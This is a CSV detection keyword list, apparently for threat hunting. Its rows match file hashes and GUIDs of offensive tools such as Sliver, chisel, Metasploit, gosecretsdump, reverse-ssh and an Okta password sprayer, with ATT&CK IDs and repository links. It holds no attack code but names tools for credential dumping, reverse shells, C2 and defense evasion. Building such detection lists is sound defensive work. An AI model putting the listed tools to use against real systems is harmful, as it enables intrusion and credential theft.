"*01_all_exploits_have_payloads_test*",".{0,1000}01_all_exploits_have_payloads_test.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*013e2375bb6c35daca9df2a98e5ce1c963608129ce70c800fcdecb7cf63be3f8*",".{0,1000}013e2375bb6c35daca9df2a98e5ce1c963608129ce70c800fcdecb7cf63be3f8.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*0162e0e84eafc8ad462d99ab698da4deb9d8363a5c02a5624b3dc3640ebd3e21*",".{0,1000}0162e0e84eafc8ad462d99ab698da4deb9d8363a5c02a5624b3dc3640ebd3e21.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*017c2b90e43274da40ed0346587b5a2d02af576b305b882eb31806eb7509655c*",".{0,1000}017c2b90e43274da40ed0346587b5a2d02af576b305b882eb31806eb7509655c.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*01ac77412cfd1be301554bc8db9e5f499337ff1ee631f1ed43a3454d60d25a48*",".{0,1000}01ac77412cfd1be301554bc8db9e5f499337ff1ee631f1ed43a3454d60d25a48.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*01C142BA-7AF1-48D6-B185-81147A2F7DB7*",".{0,1000}01C142BA\-7AF1\-48D6\-B185\-81147A2F7DB7.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*01c8974109c2a3e134f3dfbdd01e0cb277b41d9aee313f33ddec6bb6157e8f84*",".{0,1000}01c8974109c2a3e134f3dfbdd01e0cb277b41d9aee313f33ddec6bb6157e8f84.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*01d38f94612e1b04e52b08c8ab75d8c614a5e9a716b01754ef4884a06e9669c3*",".{0,1000}01d38f94612e1b04e52b08c8ab75d8c614a5e9a716b01754ef4884a06e9669c3.{0,1000}","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","0","N/A","8","N/A","N/A","N/A","N/A","N/A" "*01dc5af0ad49e564af57a8debc4b3c354fdcd3f85b36e9f5b5511bd674b98dce*",".{0,1000}01dc5af0ad49e564af57a8debc4b3c354fdcd3f85b36e9f5b5511bd674b98dce.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*02024fe8246f659fb6dd07eaf93379e8a8011420d10b83e6bb422b66e53c4292*",".{0,1000}02024fe8246f659fb6dd07eaf93379e8a8011420d10b83e6bb422b66e53c4292.{0,1000}","offensive_tool_keyword","Okta-Password-Sprayer","This script is a multi-threaded Okta password sprayer.","T1110 - T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/Rhynorater/Okta-Password-Sprayer","1","0","N/A","10","1","64","16","2024-01-05T16:24:38Z","2018-09-24T23:39:16Z" "*02091a63c2130e04b47ea5947c12d3c850616d21da8d628f0ae91e2cf43f7f4b*",".{0,1000}02091a63c2130e04b47ea5947c12d3c850616d21da8d628f0ae91e2cf43f7f4b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*020e1dde294fabdc174cfec3d2405f70d462a897241582d16aff6670230acc45*",".{0,1000}020e1dde294fabdc174cfec3d2405f70d462a897241582d16aff6670230acc45.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*02151e34b45cec985c68b52bc6dcbd2014116d22e92408e19e471e7fdb37baf6*",".{0,1000}02151e34b45cec985c68b52bc6dcbd2014116d22e92408e19e471e7fdb37baf6.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*021ae50ec89266dabb1f96f703ec04dad908eef0e63d12c1ed38a40833198f79*",".{0,1000}021ae50ec89266dabb1f96f703ec04dad908eef0e63d12c1ed38a40833198f79.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*0235a4141278cb9aa45413f9ed58f0c20ae38dbae48b8440a1b96e4544e6857f*",".{0,1000}0235a4141278cb9aa45413f9ed58f0c20ae38dbae48b8440a1b96e4544e6857f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*0253413ed641b86b351fc3b9355715f7d62c74bc1d954dd0c9cff13693535a82*",".{0,1000}0253413ed641b86b351fc3b9355715f7d62c74bc1d954dd0c9cff13693535a82.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*0257fba1e0ecd10af76bf252a76f03656f194bb2173f8555dabd86a03c7df621*",".{0,1000}0257fba1e0ecd10af76bf252a76f03656f194bb2173f8555dabd86a03c7df621.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*026a94e75aa94054623b3e2d617c8c59ce6e63edce3e739cbe94283a1eca394a*",".{0,1000}026a94e75aa94054623b3e2d617c8c59ce6e63edce3e739cbe94283a1eca394a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*027954d28fd8fa98e06be72439e5a987d2d280a8e3c8d2ab91a4a55d39cbe846*",".{0,1000}027954d28fd8fa98e06be72439e5a987d2d280a8e3c8d2ab91a4a55d39cbe846.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*027bf95a524ee9daf472869e548c9221b16d4a5230de187e5ae9ba9a9e98cfba*",".{0,1000}027bf95a524ee9daf472869e548c9221b16d4a5230de187e5ae9ba9a9e98cfba.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*02947e9a3759fea352b81bdf4390b6dfb5ea5823ed4836e1e7a46e5d9b65263c*",".{0,1000}02947e9a3759fea352b81bdf4390b6dfb5ea5823ed4836e1e7a46e5d9b65263c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*02948DD6-47BD-4C82-9B4B-78931DB23B8A*",".{0,1000}02948DD6\-47BD\-4C82\-9B4B\-78931DB23B8A.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*029558a5c334d67b479885be83f0e0dc856189d1de14ad1d4136b7d451498daa*",".{0,1000}029558a5c334d67b479885be83f0e0dc856189d1de14ad1d4136b7d451498daa.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*02EF15C0-BA19-4115-BB7F-F5B04F7087FE*",".{0,1000}02EF15C0\-BA19\-4115\-BB7F\-F5B04F7087FE.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*030cc05376c7c249583648d5324f8d2bad47ea9af1a4f1a751a09db700eb5817*",".{0,1000}030cc05376c7c249583648d5324f8d2bad47ea9af1a4f1a751a09db700eb5817.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*030d5d76052e0da4488b216db816fd13bdaf25e047f0b34820a2b55305f9fd8c*",".{0,1000}030d5d76052e0da4488b216db816fd13bdaf25e047f0b34820a2b55305f9fd8c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*0313676f45763c5b4e90928b7f9d357253db656f86f8326420f51bbb9fde9238*",".{0,1000}0313676f45763c5b4e90928b7f9d357253db656f86f8326420f51bbb9fde9238.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*031c6896d87b890a2cd54948297d5d804a5e3b52a067a81b7dd12c1c4ad77496*",".{0,1000}031c6896d87b890a2cd54948297d5d804a5e3b52a067a81b7dd12c1c4ad77496.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*0322cddf469dfbc17a818a30fb9eb4704a7217a62a8e5f7dc45ab3c89ab7dffe*",".{0,1000}0322cddf469dfbc17a818a30fb9eb4704a7217a62a8e5f7dc45ab3c89ab7dffe.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*033ac18935c14c208d6caf86bcb38ea0422f1ace50be938e56d00a480b8e5611*",".{0,1000}033ac18935c14c208d6caf86bcb38ea0422f1ace50be938e56d00a480b8e5611.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*034B1C28-96B9-486A-B238-9C651EAA32CA*",".{0,1000}034B1C28\-96B9\-486A\-B238\-9C651EAA32CA.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*03600de62239db741db7a1d072a4e8504c25b64b7d398d5c80d467452aefbfad*",".{0,1000}03600de62239db741db7a1d072a4e8504c25b64b7d398d5c80d467452aefbfad.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*037abc006fd6d9877d3f63baa4d32ebedd18b5a1ce6f51c22aa0d18c7ad1e352*",".{0,1000}037abc006fd6d9877d3f63baa4d32ebedd18b5a1ce6f51c22aa0d18c7ad1e352.{0,1000}","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1557","TA0001 - TA0006","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","0","file_hash","8","5","427","61","2024-03-13T20:04:51Z","2022-01-16T06:50:44Z" "*03bf355ada5fc5ff405e694df967e893d9db590653fa89c1be81350aceda72d9*",".{0,1000}03bf355ada5fc5ff405e694df967e893d9db590653fa89c1be81350aceda72d9.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*03c8bb25a392802593dc4cc97bbd596b5059ece8bebd36790bae7f6b7b2eb2c1*",".{0,1000}03c8bb25a392802593dc4cc97bbd596b5059ece8bebd36790bae7f6b7b2eb2c1.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*040f67227ccb5fad854663f4162556c6c154d2ef4c0465e62d0ccef37ac4637a*",".{0,1000}040f67227ccb5fad854663f4162556c6c154d2ef4c0465e62d0ccef37ac4637a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0421df6cf7ecab2db20777414d571ce0daeffb52edf58ff6fb873826c4a1f6ad*",".{0,1000}0421df6cf7ecab2db20777414d571ce0daeffb52edf58ff6fb873826c4a1f6ad.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*0430a3e7a1c50c8b42d5129089ca7f31a28d0b4a9aeda7a96a1d686fde52a9e4*",".{0,1000}0430a3e7a1c50c8b42d5129089ca7f31a28d0b4a9aeda7a96a1d686fde52a9e4.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*0434b626258ae9832074c8693921e3252a1804e506e555b5053f0793fc9e6f09*",".{0,1000}0434b626258ae9832074c8693921e3252a1804e506e555b5053f0793fc9e6f09.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*04387d7368c1a46d5dc11600b888fbe5890e30a793019d408bde0565a6a3dadb*",".{0,1000}04387d7368c1a46d5dc11600b888fbe5890e30a793019d408bde0565a6a3dadb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0461e84f847489e8968b011128b6be6b001f487ae75b2a0c14ff6d4eafc9f2df*",".{0,1000}0461e84f847489e8968b011128b6be6b001f487ae75b2a0c14ff6d4eafc9f2df.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*04628de68152672ff3ddfb372e1daa31b2f124ac79f98f245913522da3675468*",".{0,1000}04628de68152672ff3ddfb372e1daa31b2f124ac79f98f245913522da3675468.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*0472A393-9503-491D-B6DA-FA47CD567EDE*",".{0,1000}0472A393\-9503\-491D\-B6DA\-FA47CD567EDE.{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","0","N/A","9","2","161","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" "*048c215b812c16ffa4d64a8f3da77e2418457e7d8eb89b2716bdb65f176a665a*",".{0,1000}048c215b812c16ffa4d64a8f3da77e2418457e7d8eb89b2716bdb65f176a665a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*04991e2f282b817df64efc7d76e57068f36993903e59c03acf05286cddbb75ff*",".{0,1000}04991e2f282b817df64efc7d76e57068f36993903e59c03acf05286cddbb75ff.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*04b76edf1ba46b49f42c67669dbc807e550682709c977665c0c7b37d2bb5e0d2*",".{0,1000}04b76edf1ba46b49f42c67669dbc807e550682709c977665c0c7b37d2bb5e0d2.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*04b99fb5cc1d91b1752fbcb2446db71083ab87af59dd9e0d940cc2ed5a65ef49*",".{0,1000}04b99fb5cc1d91b1752fbcb2446db71083ab87af59dd9e0d940cc2ed5a65ef49.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*04ca7e137e1e9feead96a7df45bb67d5ab3de190*",".{0,1000}04ca7e137e1e9feead96a7df45bb67d5ab3de190.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","10","10","1075","161","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" 